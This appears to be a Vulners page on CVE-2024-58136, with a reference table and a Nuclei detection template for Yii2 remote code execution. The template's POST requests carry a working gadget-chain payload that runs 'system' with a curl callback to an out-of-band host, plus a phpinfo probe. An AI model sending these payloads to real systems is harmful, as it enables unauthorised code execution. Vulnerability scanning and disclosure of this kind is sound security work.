| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
| CVE-2024-58136 | 10 Apr 202500:00 | – | attackerkb | |
| The vulnerability of the Yii2::createObject() method in the Yii PHP framework allows a attacker to execute arbitrary code. | 28 May 202500:00 | – | bdu_fstec | |
| CVE-2024-58136 | 10 Apr 202503:40 | – | circl | |
| Yiiframework Yii Improper Protection of Alternate Path Vulnerability | 2 May 202500:00 | – | cisa_kev | |
| CISA Adds Two Known Exploited Vulnerabilities to Catalog | 2 May 202512:00 | – | cisa | |
| Yii 安全漏洞 | 10 Apr 202500:00 | – | cnnvd | |
| CVE-2024-58136 | 10 Apr 202500:00 | – | cve | |
| CVE-2024-58136 | 10 Apr 202500:00 | – | cvelist | |
| yiisoft/yii2 Mishandles the Attaching of Behavior Defined by a `__class` Array Key | 10 Apr 202503:31 | – | github | |
| CVE-2024-58136 | 10 Apr 202503:15 | – | nvd |
id: CVE-2024-58136
info:
name: Yii2 PHP Framework < 2.0.52 - Remote Code Execution
author: ritikchaddha
severity: critical
description: |
Yii2 PHP Framework before 2.0.52 is vulnerable to remote code execution via improper validation of the __class key in JSON behaviors. An attacker can instantiate arbitrary PHP classes and achieve RCE.
impact: |
Unauthenticated attackers can exploit improper validation of the __class key in JSON behaviors to instantiate arbitrary PHP classes and achieve remote code execution.
remediation: |
Update Yii2 PHP Framework to version 2.0.52 or later to address the remote code execution vulnerability.
reference:
- https://infosecwriteups.com/from-behaviors-to-shells-yii2-php-framework-rce-cve-2024-58136-exploit-and-mitigation-e47a60a3cecb
- https://nvd.nist.gov/vuln/detail/CVE-2024-58136
classification:
epss-score: 0.87776
epss-percentile: 0.9974
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-58136
cwe-id: CWE-94
cpe: cpe:2.3:a:yiisoft:yii:2.0.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: yiisoft
product: yii
fofa-query: title="Yii"
shodan-query: title:"Yii"
tags: cve,cve2024,yii2,rce,php,framework,kev,vkev,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: word
words:
- "Yii"
internal: true
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream":"curl {{interactsh-url}}"}}
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "phpinfo"}}
matchers-condition: or
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
words:
- "PHP Version"
- "PHP Extension"
condition: and
# digest: 4a0a00473045022100c29ee0f66b1984fd7aaf1cb810b807c29f38a578181f84215718109efad5f8780220626a3fdebb5337185f421bf08e671aa1c3380158ca205d77c12b30de2a9cfda4:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation